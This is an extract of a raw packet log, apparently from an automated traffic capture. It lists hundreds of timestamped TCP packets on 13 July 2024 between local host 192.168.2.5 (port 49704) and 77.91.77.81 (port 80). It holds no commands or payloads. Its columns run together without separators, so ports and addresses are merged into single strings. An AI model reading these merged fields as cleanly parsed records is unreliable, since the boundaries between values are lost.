                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240597010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240597010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240597010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240597010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240597010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240597010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240623951 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240623951 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240623951 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240639925 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240657091 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240672112 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240674973 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240690947 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240719080 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240719080 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240777016 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240792990 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240808964 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240824938 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240828991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240839005 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240854979 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.240869045 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279159069 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279207945 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279242992 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279275894 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279309988 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279341936 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279369116 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279369116 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279369116 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279370070 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279377937 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279629946 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279629946 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.279629946 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280143023 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280184984 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280220032 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280225992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280237913 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280255079 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280271053 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280306101 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280308962 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280344009 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280360937 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280376911 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280399084 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280411959 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280426025 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.280466080 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317677021 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317747116 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317783117 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317815065 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317868948 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317889929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317890882 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317890882 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317902088 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317938089 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.317971945 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318006992 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318038940 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318074942 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318106890 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318140984 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318175077 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318229914 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318229914 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318319082 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318319082 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318319082 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318320036 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318399906 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318490982 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318557978 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318592072 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318624973 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318635941 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318660021 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318660021 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318679094 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318695068 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318712950 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318748951 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318759918 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318799019 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318819046 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318834066 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318864107 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318867922 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318892956 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318902016 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318922043 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318954945 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318963051 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.318989992 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319015026 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319024086 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319041014 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319062948 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319083929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319092035 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319128036 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319149971 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319308043 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319372892 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319402933 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319442034 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319468021 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319505930 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319523096 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319555998 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319581985 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319591045 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319603920 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319626093 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319643974 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319657087 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319684982 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319700956 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319703102 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319732904 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319766045 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319766998 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319788933 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319802046 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319818020 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319838047 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319861889 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319873095 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319888115 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319909096 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319930077 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319943905 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.319966078 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.320000887 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321602106 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321635008 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321664095 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321683884 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321683884 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321692944 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321711063 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321717978 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321731091 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321738005 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321755886 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321762085 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321772099 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321784973 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321791887 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321809053 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321810007 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321826935 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321826935 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321842909 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321847916 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321867943 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321880102 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321881056 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321887016 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321902990 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321903944 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321921110 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321938038 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321954966 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.321964979 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322017908 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322020054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322036982 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322053909 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322069883 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322079897 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322088003 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322108030 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322108030 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322128057 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322144032 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322216988 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322233915 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322251081 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322263956 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322278023 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322299957 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322334051 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322396040 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322412968 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322427988 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322443008 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322454929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322458982 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322474957 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322475910 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322496891 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322521925 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322690010 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322704077 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322717905 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322734118 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322747946 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322753906 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322763920 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322777033 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322782993 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322797060 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322801113 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322840929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322873116 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322923899 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322940111 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322956085 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322971106 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.322990894 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.323023081 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.323033094 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.323043108 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.323095083 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.323151112 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355514050 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355534077 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355585098 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355597973 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355612993 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355631113 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355657101 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355671883 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355688095 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355703115 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355717897 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355732918 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751038 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355751991 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355863094 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355863094 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355863094 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.355864048 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356374025 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356406927 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356422901 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356437922 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356451988 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356453896 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356451988 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356471062 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356476068 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356497049 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356503963 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356522083 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356540918 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356540918 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356540918 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.356591940 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367657900 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367702961 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367742062 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367746115 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367765903 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367778063 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367790937 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367814064 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.367830992 CEST4970480192.168.2.577.91.77.81
